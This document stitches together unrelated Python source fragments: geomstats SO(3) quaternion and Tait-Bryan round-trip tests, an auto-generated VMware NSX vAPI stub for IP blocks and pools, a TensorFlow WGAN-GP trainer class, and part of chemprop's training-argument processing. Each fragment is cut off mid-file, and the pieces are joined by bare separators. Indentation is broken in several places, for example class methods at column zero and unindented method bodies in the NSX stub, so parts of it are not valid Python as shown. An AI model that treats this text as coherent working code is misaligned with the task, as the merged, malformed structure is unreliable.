    self.assertAllClose(so3.quaternion_from_tait_bryan_angles(vec, coord, order), quat)
    self.assertAllClose(so3.tait_bryan_angles_from_quaternion(quat, coord, order), vec)
def test_quaternion_from_rotation_vector_tait_bryan_angles(
    self, coord, order, point
):
    """quaternion -> Tait-Bryan angles -> quaternion is the identity."""
    so3 = self.space(3, point_type="vector")
    quat = so3.quaternion_from_rotation_vector(point)
    angles = so3.tait_bryan_angles_from_quaternion(quat, coord, order)
    self.assertAllClose(
        so3.quaternion_from_tait_bryan_angles(angles, coord, order), quat
    )
def test_tait_bryan_angles_rotation_vector(self, coord, order, point):
    """rotation-vector -> Tait-Bryan -> rotation-vector yields the regularized input."""
    so3 = self.space(3, point_type="vector")
    angles = so3.tait_bryan_angles_from_rotation_vector(point, coord, order)
    recovered = so3.rotation_vector_from_tait_bryan_angles(angles, coord, order)
    self.assertAllClose(recovered, so3.regularize(point))
def test_quaternion_and_rotation_vector_with_angles_close_to_pi(self, point):
    """Near pi, the quaternion round trip recovers the regularized vector up to sign."""
    so3 = self.space(3, point_type="vector")
    recovered = so3.rotation_vector_from_quaternion(
        so3.quaternion_from_rotation_vector(point)
    )
    regularized = so3.regularize(point)
    matches = gs.allclose(recovered, regularized) or gs.allclose(
        recovered, -1 * regularized
    )
    self.assertAllClose(matches, gs.array(True))
def test_quaternion_and_matrix_with_angles_close_to_pi(self, point):
    """Near pi, the quaternion round trip recovers the matrix or its inverse."""
    so3 = self.space(3, point_type="vector")
    mat = so3.matrix_from_rotation_vector(point)
    round_trip = so3.matrix_from_quaternion(so3.quaternion_from_matrix(mat))
    matches = gs.allclose(round_trip, mat) or gs.allclose(
        round_trip, gs.linalg.inv(mat)
    )
    self.assertAllClose(matches, gs.array(True))
def test_rotation_vector_and_rotation_matrix_with_angles_close_to_pi(self, point):
    """Near pi, the matrix round trip recovers the regularized vector up to sign."""
    so3 = self.space(3, point_type="vector")
    recovered = so3.rotation_vector_from_matrix(
        so3.matrix_from_rotation_vector(point)
    )
    regularized = so3.regularize(point)
    matches = gs.allclose(recovered, regularized) or gs.allclose(
        recovered, -1 * regularized
    )
    self.assertAllClose(matches, gs.array(True))
def test_lie_bracket(self, tangent_vec_a, tangent_vec_b, base_point, expected):
    """Lie bracket of two tangent vectors at `base_point` matches `expected`."""
    so3 = self.space(3, point_type="vector")
    self.assertAllClose(
        so3.lie_bracket(tangent_vec_a, tangent_vec_b, base_point), expected
    )
@geomstats.tests.np_autograd_and_torch_only
def test_group_exp_after_log_with_angles_close_to_pi(self, point, base_point):
    """Check exp(log(point, base_point), base_point) == regularize(point).

    For rotation angles close to pi the recovered point may differ by an
    overall sign, so both `expected` and `-expected` are accepted, with a
    loose tolerance (atol=5e-3).
    """
    # TODO(nguigs): fix this test for tf
    group = self.space(3, point_type="vector")
    result = group.exp(group.log(point, base_point), base_point)
    expected = group.regularize(point)
    inv_expected = -expected
    self.assertTrue(
        gs.allclose(result, expected, atol=5e-3)
        or gs.allclose(result, inv_expected, atol=5e-3)
    )
def test_group_log_after_exp_with_angles_close_to_pi(self, tangent_vec, base_point):
    """Check log(exp(tangent_vec, base_point), base_point) recovers the
    regularized tangent vector.

    As in the exp-after-log test, angles close to pi make the answer
    sign-ambiguous, so both signs are accepted with atol=5e-3. The tangent
    vector is regularized with the left canonical metric before comparison.
    """
    group = self.space(3, point_type="vector")
    result = group.log(group.exp(tangent_vec, base_point), base_point)
    metric = group.left_canonical_metric
    reg_tangent_vec = group.regularize_tangent_vec(
        tangent_vec=tangent_vec, base_point=base_point, metric=metric
    )
    expected = reg_tangent_vec
    inv_expected = -expected
    self.assertTrue(
        gs.allclose(result, expected, atol=5e-3)
        or gs.allclose(result, inv_expected, atol=5e-3)
    )
def test_left_jacobian_vectorization(self, n_samples):
| |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.pools.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class IpBlocks(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.pools.ip_blocks'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
    """
    :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
    :param config: Configuration to be used for creating the stub.
    """
    # Bind this interface to its generated REST stub class.
    VapiInterface.__init__(self, config, _IpBlocksStub)
    # No operation-specific task ids are registered for this service.
    self._VAPI_OPERATION_IDS = {}
def create(self,
           ip_block,
           ):
    """
    Creates a new IPv4 address block using the specified cidr. cidr is a
    required parameter. display_name & description are optional parameters

    :type ip_block: :class:`com.vmware.nsx.model_client.IpBlock`
    :param ip_block: (required)
    :rtype: :class:`com.vmware.nsx.model_client.IpBlock`
    :return: com.vmware.nsx.model.IpBlock
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # Auto-generated: dispatch to the 'create' operation of the bound stub.
    return self._invoke('create',
                        {
                            'ip_block': ip_block,
                        })
def delete(self,
block_id,
):
"""
Deletes the IP address block with specified id if it exists. IP block
cannot be deleted if there are allocated subnets from the block.
:type block_id: :class:`str`
:param block_id: IP address block id (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'block_id': block_id,
})
def get(self,
block_id,
):
"""
Returns information about the IP address block with specified id.
Information includes id, display_name, description & cidr.
:type block_id: :class:`str`
:param block_id: IP address block id (required)
:rtype: :class:`com.vmware.nsx.model_client.IpBlock`
:return: com.vmware.nsx.model.IpBlock
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'block_id': block_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about configured IP address blocks. Information
includes the id, display name, description & CIDR of IP address blocks
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.IpBlockListResult`
:return: com.vmware.nsx.model.IpBlockListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
block_id,
ip_block,
):
"""
Modifies the IP address block with specifed id. display_name,
description and cidr are parameters that can be modified. If a new cidr
is specified, it should contain all existing subnets in the IP block.
Returns a conflict error if the IP address block cidr can not be
modified due to the presence of subnets that it contains. Eg: If the IP
block contains a subnet 192.168.0.1/24 and we try to change the IP
block cidr to 10.1.0.1/16, it results in a conflict.
:type block_id: :class:`str`
:param block_id: IP address block id (required)
:type ip_block: :class:`com.vmware.nsx.model_client.IpBlock`
:param ip_block: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpBlock`
:return: com.vmware.nsx.model.IpBlock
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'block_id': block_id,
'ip_block': ip_block,
})
class IpPools(VapiInterface):
    """
    Stub for the NSX IP address pool service. Provides CRUD operations on
    IP pools plus allocation/release of individual addresses from a pool.
    """
    # Value for the ``action`` argument requesting that an address be
    # allocated from the pool.
    ALLOCATEORRELEASE_ACTION_ALLOCATE = "ALLOCATE"
    """
    Possible value for ``action`` of method :func:`IpPools.allocateorrelease`.
    """
    # Value for the ``action`` argument requesting that an address be
    # released back to the pool.
    ALLOCATEORRELEASE_ACTION_RELEASE = "RELEASE"
    """
    Possible value for ``action`` of method :func:`IpPools.allocateorrelease`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.pools.ip_pools'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _IpPoolsStub)
        # Mapping of operation name to task-operation id; empty for this
        # service.
        self._VAPI_OPERATION_IDS = {}
def allocateorrelease(self, pool_id, allocation_ip_address, action):
    """Allocate an IP address from, or release one back to, the given pool.

    :type  pool_id: :class:`str`
    :param pool_id: IP pool ID (required)
    :type  allocation_ip_address: :class:`com.vmware.nsx.model_client.AllocationIpAddress`
    :param allocation_ip_address: (required)
    :type  action: :class:`str`
    :param action: Specifies allocate or release action (required); see
        :attr:`IpPools.ALLOCATEORRELEASE_ACTION_ALLOCATE` and
        :attr:`IpPools.ALLOCATEORRELEASE_ACTION_RELEASE`
    :rtype: :class:`com.vmware.nsx.model_client.AllocationIpAddress`
    :return: com.vmware.nsx.model.AllocationIpAddress
    :raise: vAPI error classes from
        :mod:`com.vmware.vapi.std.errors_client` (``ServiceUnavailable``,
        ``InvalidRequest``, ``InternalServerError``, ``ConcurrentChange``,
        ``Unauthorized``, ``NotFound``)
    """
    request = {
        'pool_id': pool_id,
        'allocation_ip_address': allocation_ip_address,
        'action': action,
    }
    return self._invoke('allocateorrelease', request)
def create(self, ip_pool):
    """Create a new IPv4 or IPv6 address pool.

    Required parameters are allocation_ranges and cidr. Optional
    parameters are display_name, description, dns_nameservers,
    dns_suffix, and gateway_ip.

    :type  ip_pool: :class:`com.vmware.nsx.model_client.IpPool`
    :param ip_pool: (required)
    :rtype: :class:`com.vmware.nsx.model_client.IpPool`
    :return: com.vmware.nsx.model.IpPool
    :raise: vAPI error classes from
        :mod:`com.vmware.vapi.std.errors_client` (``ServiceUnavailable``,
        ``InvalidRequest``, ``InternalServerError``, ``Unauthorized``,
        ``NotFound``)
    """
    return self._invoke('create', {'ip_pool': ip_pool})
def delete(self, pool_id, force=None):
    """Delete the specified IP address pool.

    By default an IpPool that is used in other configurations (such as a
    transport node template) is not deleted; pass ``force=True`` to
    force-delete it anyway.

    :type  pool_id: :class:`str`
    :param pool_id: IP pool ID (required)
    :type  force: :class:`bool` or ``None``
    :param force: Force delete the resource even if it is being used
        somewhere (optional, default to false)
    :raise: vAPI error classes from
        :mod:`com.vmware.vapi.std.errors_client` (``ServiceUnavailable``,
        ``InvalidRequest``, ``InternalServerError``, ``Unauthorized``,
        ``NotFound``)
    """
    return self._invoke('delete', {'pool_id': pool_id, 'force': force})
def get(self, pool_id):
    """Return information about the specified IP address pool.

    :type  pool_id: :class:`str`
    :param pool_id: IP pool ID (required)
    :rtype: :class:`com.vmware.nsx.model_client.IpPool`
    :return: com.vmware.nsx.model.IpPool
    :raise: vAPI error classes from
        :mod:`com.vmware.vapi.std.errors_client` (``ServiceUnavailable``,
        ``InvalidRequest``, ``InternalServerError``, ``Unauthorized``,
        ``NotFound``)
    """
    return self._invoke('get', {'pool_id': pool_id})
def list(self, cursor=None, included_fields=None, page_size=None,
         sort_ascending=None, sort_by=None):
    """Return a paged listing of the configured IP address pools.

    Information includes the display name and description of the pool and
    the details of each of its subnets: DNS servers, allocation ranges,
    gateway, and CIDR subnet address.

    :type  cursor: :class:`str` or ``None``
    :param cursor: Opaque cursor to be used for getting next page of
        records (supplied by current result page) (optional)
    :type  included_fields: :class:`str` or ``None``
    :param included_fields: Comma separated list of fields that should be
        included in query result (optional)
    :type  page_size: :class:`long` or ``None``
    :param page_size: Maximum number of results to return in this page
        (server may return fewer) (optional, default to 1000)
    :type  sort_ascending: :class:`bool` or ``None``
    :param sort_ascending: (optional)
    :type  sort_by: :class:`str` or ``None``
    :param sort_by: Field by which records are sorted (optional)
    :rtype: :class:`com.vmware.nsx.model_client.IpPoolListResult`
    :return: com.vmware.nsx.model.IpPoolListResult
    :raise: vAPI error classes from
        :mod:`com.vmware.vapi.std.errors_client` (``ServiceUnavailable``,
        ``InvalidRequest``, ``InternalServerError``, ``Unauthorized``,
        ``NotFound``)
    """
    query = {
        'cursor': cursor,
        'included_fields': included_fields,
        'page_size': page_size,
        'sort_ascending': sort_ascending,
        'sort_by': sort_by,
    }
    return self._invoke('list', query)
def update(self,
pool_id,
ip_pool,
):
"""
Modifies the specified IP address pool. Modifiable parameters include
the description, display_name, and all subnet information.
:type pool_id: :class:`str`
:param pool_id: IP pool ID (required)
:type ip_pool: :class:`com.vmware.nsx.model_client.IpPool`
:param ip_pool: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpPool`
:return: com.vmware.nsx.model.IpPool
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'pool_id': | |
# Repository: rharish101/mnist-gan
"""Class for training the GAN."""
from pathlib import Path
from typing import Final, List, NamedTuple, Tuple
import tensorflow as tf
from tensorflow import Tensor, Variable
from tensorflow.data import Dataset
from tensorflow.distribute import ReduceOp, Strategy
from tensorflow.keras import Model
from tensorflow.keras.mixed_precision import LossScaleOptimizer
from tensorflow.keras.optimizers import Adam, Optimizer
from tensorflow.keras.optimizers.schedules import ExponentialDecay
from tqdm import tqdm
from ..evaluation import RunningFID
from ..utils import Config, get_grid, reduce_concat
class _Losses(NamedTuple):
    """Holds all the losses for logging.

    Attributes:
        wass: The Wasserstein loss
        grad_pen: The Wasserstein gradient penalty
        gen_reg: The regularization for the generator
        crit_reg: The regularization for the critic
    """

    wass: Tensor
    grad_pen: Tensor
    gen_reg: Tensor
    crit_reg: Tensor
class GANTrainer:
    """Class to train a GAN.

    Attributes:
        GEN_PATH: The prefix for the file name of the generator's saved weights
        CRIT_PATH: The prefix for the file name of the critic's saved weights
        generator: The generator model being trained
        critic: The critic model being trained
        train_dataset: The dataset of real images and labels for training
        val_dataset: The dataset of real images and labels for validation
        gen_optim: The optimizer for the generator
        crit_optim: The optimizer for the critic
        evaluator: The object that calculates the running FID
        writer: The summary writer to log TensorBoard summaries
        config: The hyper-param config
        save_dir: Directory where to store model weights
    """

    # Checkpoint file names, resolved relative to ``save_dir``.
    GEN_PATH: Final = "generator.ckpt"
    CRIT_PATH: Final = "critic.ckpt"
def __init__(
    self,
    generator: Model,
    critic: Model,
    classifier: Model,
    strategy: Strategy,
    train_dataset: Dataset,
    val_dataset: Dataset,
    config: Config,
    log_dir: Path,
    save_dir: Path,
):
    """Store main models and info required for training.

    Args:
        generator: The generator model to be trained
        critic: The critic model to be trained
        classifier: The trained classifier model for FID
        strategy: The distribution strategy for training the GAN
        train_dataset: The dataset of real images and labels for training
        val_dataset: The dataset of real images and labels for validation
        config: The hyper-param config
        log_dir: Directory where to write event logs
        save_dir: Directory where to store model weights
    """
    self.generator = generator
    self.critic = critic
    self.strategy = strategy
    self.mixed_precision = config.mixed_precision
    self.train_dataset = train_dataset
    self.val_dataset = val_dataset
    # Optimizer variables must be created within the strategy scope so
    # that they are distributed across replicas like the model variables.
    with strategy.scope():

        def get_lr_sched(lr):
            # Exponentially decaying LR schedule, shared shape for both
            # optimizers (only the initial rate differs).
            return ExponentialDecay(
                lr, config.decay_steps, config.decay_rate
            )

        # Adam with beta_1 = 0.5 (second positional argument).
        self.gen_optim = Adam(get_lr_sched(config.gen_lr), 0.5)
        self.crit_optim = Adam(get_lr_sched(config.crit_lr), 0.5)
        if config.mixed_precision:
            # Wrap with dynamic loss scaling to avoid gradient underflow
            # when training in float16.
            self.gen_optim = LossScaleOptimizer(self.gen_optim)
            self.crit_optim = LossScaleOptimizer(self.crit_optim)
    self.evaluator = RunningFID(classifier)
    self.writer = tf.summary.create_file_writer(str(log_dir))
    self.config = config
    self.save_dir = save_dir
@tf.function
def _init_optim(self) -> None:
    """Initialize the optimizer variables.

    This is needed because TensorFlow doesn't allow variable creation after
    `tf.function`'s graph has been traced once. This is a workaround for
    the TensorFlow issue here:
    https://github.com/tensorflow/tensorflow/issues/27120
    """

    def create_vars():
        for model, optim in [
            (self.generator, self.gen_optim),
            (self.critic, self.crit_optim),
        ]:
            # The optimizer will initialize its variables only on applying
            # gradients. Therefore, we use zero grads.
            grads_and_vars = [
                (tf.zeros_like(var), var)
                for var in model.trainable_variables
            ]
            optim.apply_gradients(grads_and_vars)

    # Run per-replica so the optimizer slot variables are created on every
    # replica of the strategy.
    self.strategy.run(create_vars, args=tuple())
def _get_losses(
    self,
    real: Tensor,
    generated: Tensor,
    labels: Tensor,
    crit_real_out: Tensor,
    crit_fake_out: Tensor,
) -> _Losses:
    """Compute every loss term for one step, as required by `log_summaries`.

    Args:
        real: The input real images
        generated: The corresponding generated images
        labels: The corresponding input labels
        crit_real_out: The critic's output on the real images
        crit_fake_out: The critic's output on the generated images

    Returns:
        A `_Losses` tuple with the Wasserstein loss, the gradient penalty,
        and both models' regularization losses.
    """
    global_batch = self.config.gan_batch_size
    # Difference of critic scores, averaged over the *global* batch, is
    # the Wasserstein distance estimate.
    wass_loss = tf.nn.compute_average_loss(
        crit_real_out - crit_fake_out, global_batch_size=global_batch
    )
    penalty = self._gradient_penalty(real, generated, labels)
    # NOTE: Regularization needs to be scaled by the number of GPUs in
    # the strategy, as gradients will be added.
    reg_gen = tf.nn.scale_regularization_loss(sum(self.generator.losses))
    reg_crit = tf.nn.scale_regularization_loss(sum(self.critic.losses))
    return _Losses(wass_loss, penalty, reg_gen, reg_crit)
def _gradient_penalty(
    self, real: Tensor, generated: Tensor, labels: Tensor
) -> Tensor:
    """Return the Wasserstein Gradient Penalty loss.

    The original paper can be found at: https://arxiv.org/abs/1704.00028

    Args:
        real: The input real images
        generated: The corresponding generated images
        labels: The corresponding input labels

    Returns:
        The gradient penalty loss
    """
    with tf.GradientTape() as tape:
        # U[0, 1] random value used for linear interpolation
        # NOTE(review): a single scalar is drawn for the whole batch, not
        # one per example as in the WGAN-GP paper — confirm intended.
        gp_rand = tf.random.uniform(())
        gp_inputs = real * gp_rand + generated * (1 - gp_rand)
        # Forces the tape to track the inputs, which is needed for
        # calculating gradients in the gradient penalty.
        tape.watch(gp_inputs)
        crit_gp_out = self.critic([gp_inputs, labels], training=True)
    # Gradient of the critic output w.r.t. the interpolated inputs.
    grads = tape.gradient(crit_gp_out, gp_inputs)
    # Per-example L2 norm over the flattened gradient.
    flat_grads = tf.reshape(grads, (grads.shape[0], -1))
    norm = tf.norm(flat_grads, axis=1)
    # Penalize deviation of the gradient norm from 1.
    gp_batch = (norm - 1) ** 2
    return tf.nn.compute_average_loss(
        gp_batch, global_batch_size=self.config.gan_batch_size
    )
def _optimize(
    self,
    train_vars: List[Variable],
    loss: Tensor,
    optim: Optimizer,
    tape: tf.GradientTape,
) -> None:
    """Apply one optimizer step for *loss* w.r.t. *train_vars*.

    Under mixed precision the loss is scaled before differentiation and
    the resulting gradients are unscaled again, as required by
    ``LossScaleOptimizer``.
    """
    scaled_loss = optim.get_scaled_loss(loss) if self.mixed_precision else loss
    grads = tape.gradient(scaled_loss, train_vars)
    if self.mixed_precision:
        grads = optim.get_unscaled_gradients(grads)
    optim.apply_gradients(zip(grads, train_vars))
def _train_step_critic(
    self, real: Tensor, generated: Tensor, labels: Tensor
) -> None:
    """Run a single training step for the critic on a single GPU.

    Args:
        real: The input real images
        generated: The corresponding generated images
        labels: The corresponding input labels
    """
    with tf.GradientTape() as crit_tape:
        crit_real_out = self.critic([real, labels], training=True)
        crit_fake_out = self.critic([generated, labels], training=True)
        losses = self._get_losses(
            real, generated, labels, crit_real_out, crit_fake_out
        )
        # The critic maximizes the Wasserstein estimate (hence the
        # negation) while being penalized by the weighted gradient
        # penalty and its own regularization.
        crit_loss = (
            -losses.wass
            + losses.crit_reg
            + self.config.gp_weight * losses.grad_pen
        )
    self._optimize(
        self.critic.trainable_variables,
        crit_loss,
        self.crit_optim,
        crit_tape,
    )
def _train_step(
    self, real: Tensor, labels: Tensor
) -> Tuple[Tensor, _Losses]:
    """Run a single training step on a single GPU.

    This training step will train the critic for the required number of
    steps as well as train the generator for a single step.

    Args:
        real: The input real images
        labels: The corresponding input labels

    Returns:
        The generated images
        The losses, as required by `log_summaries`
    """
    noise = tf.random.normal((real.get_shape()[0], self.config.noise_dims))
    with tf.GradientTape() as gen_tape:
        generated = self.generator([noise, labels], training=True)
        # No need to calculate gradients of critic optimization
        with gen_tape.stop_recording():
            for _ in range(self.config.crit_steps):
                self._train_step_critic(real, generated, labels)
        # Re-evaluate the critic inside the tape, after its updates, so
        # the generator's gradients flow through the updated critic.
        crit_real_out = self.critic([real, labels], training=True)
        crit_fake_out = self.critic([generated, labels], training=True)
        losses = self._get_losses(
            real, generated, labels, crit_real_out, crit_fake_out
        )
        # The generator minimizes the Wasserstein estimate plus its own
        # regularization.
        gen_loss = losses.wass + losses.gen_reg
    self._optimize(
        self.generator.trainable_variables,
        gen_loss,
        self.gen_optim,
        gen_tape,
    )
    # Returned values are used for logging summaries
    return generated, losses
@tf.function
def train_step(
    self, real: Tensor, labels: Tensor
) -> Tuple[Tensor, _Losses]:
    """Run a single training step, distributing across all GPUs.

    Args:
        real: The input real images
        labels: The corresponding input labels

    Returns:
        The generated images
        The losses, as required by `log_summaries`
    """
    per_replica_gen, per_replica_losses = self.strategy.run(
        self._train_step, args=(real, labels)
    )
    merged_gen = reduce_concat(self.strategy, per_replica_gen)
    # Each loss term was averaged with the global batch size, so summing
    # the per-replica values recovers the full-batch loss.
    summed_losses = _Losses(
        *(
            self.strategy.reduce(ReduceOp.SUM, term, axis=None)
            for term in per_replica_losses
        )
    )
    return merged_gen, summed_losses
def _get_fid(self) -> Tensor:
    """Compute the FID metric over the entire validation dataset."""
    self.evaluator.reset()
    for real_batch, batch_labels in self.val_dataset:
        noise = tf.random.normal(
            (real_batch.shape[0], self.config.noise_dims)
        )
        fake_batch = self.generator([noise, batch_labels])
        self.evaluator.update(real_batch, fake_batch)
    return self.evaluator.get_fid()
def log_summaries(
    self,
    real: Tensor,
    generated: Tensor,
    losses: _Losses,
    global_step: int,
) -> None:
    """Log summaries to disk.

    Writes scalar loss summaries, the FID metric over the validation
    dataset, image grids of real and generated samples, and weight
    histograms for both models.

    Args:
        real: The input real images
        generated: The generated images
        losses: The losses to be logged
        global_step: The current global training step
    """
    with self.writer.as_default():
        with tf.name_scope("losses"):
            tf.summary.scalar(
                "wasserstein_loss", losses.wass, step=global_step
            )
            tf.summary.scalar(
                "gradient_penalty", losses.grad_pen, step=global_step
            )
            tf.summary.scalar(
                "generator_regularization",
                losses.gen_reg,
                step=global_step,
            )
            tf.summary.scalar(
                "critic_regularization",
                losses.crit_reg,
                step=global_step,
            )
        with tf.name_scope("metrics"):
            # NOTE: this runs the generator over the whole validation
            # dataset, so logging is relatively expensive.
            fid = self._get_fid()
            tf.summary.scalar("FID", fid, step=global_step)
        # Save generated and real images in a square grid
        with tf.name_scope("images"):
            real_grid = get_grid(real)
            gen_grid = get_grid(generated)
            tf.summary.image("real", real_grid, step=global_step)
            tf.summary.image("generated", gen_grid, step=global_step)
        with tf.name_scope("generator"):
            for var in self.generator.trainable_variables:
                tf.summary.histogram(var.name, var, step=global_step)
        with tf.name_scope("critic"):
            for var in self.critic.trainable_variables:
                tf.summary.histogram(var.name, var, step=global_step)
def save_models(self) -> None:
    """Write the generator and critic weights into ``self.save_dir``."""
    checkpoints = (
        (self.generator, self.GEN_PATH),
        (self.critic, self.CRIT_PATH),
    )
    for net, ckpt_name in checkpoints:
        net.save_weights(self.save_dir / ckpt_name)
def train(
self, record_steps: int, save_steps: int, log_graph: bool = False
) -> None:
"""Execute the training loops for the GAN.
Args:
record_steps: Step interval for recording summaries
save_steps: Step interval for saving the model
log_graph: Whether to log the graph of the model
"""
# Total no. of batches in the training dataset
total_batches = self.train_dataset.cardinality().numpy()
dataset = self.strategy.experimental_distribute_dataset(
self.train_dataset
)
# Iterate over dataset in epochs
data_in_epochs = (
item for epoch in range(self.config.gan_epochs) for item in dataset
)
# Initialize all optimizer variables
self._init_optim()
for global_step, (real, lbls) in tqdm(
enumerate(data_in_epochs, 1),
total=self.config.gan_epochs * total_batches,
desc="Training",
):
# The graph must be exported the first time the tf.function is run,
# otherwise the graph is empty.
if global_step == 1 and log_graph:
tf.summary.trace_on()
gen, losses = self.train_step(real, lbls)
| |
splitting data into train/validation/test during cross-validation"""
return self._crossval_index_sets
@property
def task_names(self) -> List[str]:
    """A list of names of the tasks being trained on."""
    return self._task_names

@task_names.setter
def task_names(self, task_names: List[str]) -> None:
    self._task_names = task_names

@property
def num_tasks(self) -> int:
    """The number of tasks being trained on (0 when task names are unset)."""
    return len(self.task_names) if self.task_names is not None else 0

@property
def features_size(self) -> int:
    """The dimensionality of the additional molecule-level features."""
    return self._features_size

@features_size.setter
def features_size(self, features_size: int) -> None:
    self._features_size = features_size

@property
def train_data_size(self) -> int:
    """The size of the training data set."""
    return self._train_data_size

@train_data_size.setter
def train_data_size(self, train_data_size: int) -> None:
    self._train_data_size = train_data_size

@property
def atom_descriptor_scaling(self) -> bool:
    """
    Whether to apply normalization with a
    :class:`~chemprop.data.scaler.StandardScaler` to the additional atom
    features.
    """
    # Inverse of the user-facing "no_atom_descriptor_scaling" option.
    return not self.no_atom_descriptor_scaling

@property
def bond_feature_scaling(self) -> bool:
    """
    Whether to apply normalization with a
    :class:`~chemprop.data.scaler.StandardScaler` to the additional bond
    features.
    """
    # Inverse of the user-facing "no_bond_features_scaling" option.
    return not self.no_bond_features_scaling
def process_args(self) -> None:
super(TrainArgs, self).process_args()
global temp_save_dir # Prevents the temporary directory from being deleted upon function return
# Adapt the number of molecules for reaction_solvent mode
if self.reaction_solvent is True and self.number_of_molecules != 2:
raise ValueError('In reaction_solvent mode, --number_of_molecules 2 must be specified.')
# Process SMILES columns
self.smiles_columns = chemprop.data.utils.preprocess_smiles_columns(
path=self.data_path,
smiles_columns=self.smiles_columns,
number_of_molecules=self.number_of_molecules,
)
# Load config file
if self.config_path is not None:
with open(self.config_path) as f:
config = json.load(f)
for key, value in config.items():
setattr(self, key, value)
# Check whether the number of input columns is two for the reaction_solvent mode
if self.reaction_solvent is True and len(self.smiles_columns) != 2:
raise ValueError(f'In reaction_solvent mode, exactly two smiles column must be provided (one for reactions, and one for molecules)')
# Validate reaction/reaction_solvent mode
if self.reaction is True and self.reaction_solvent is True:
raise ValueError('Only reaction or reaction_solvent mode can be used, not both.')
# Create temporary directory as save directory if not provided
if self.save_dir is None:
temp_save_dir = TemporaryDirectory()
self.save_dir = temp_save_dir.name
# Fix ensemble size if loading checkpoints
if self.checkpoint_paths is not None and len(self.checkpoint_paths) > 0:
self.ensemble_size = len(self.checkpoint_paths)
# Process and validate metric and loss function
if self.metric is None:
if self.dataset_type == 'classification':
self.metric = 'auc'
elif self.dataset_type == 'multiclass':
self.metric = 'cross_entropy'
elif self.dataset_type == 'spectra':
self.metric = 'sid'
elif self.dataset_type == 'regression' and self.loss_function == 'bounded_mse':
self.metric = 'bounded_mse'
elif self.dataset_type == 'regression':
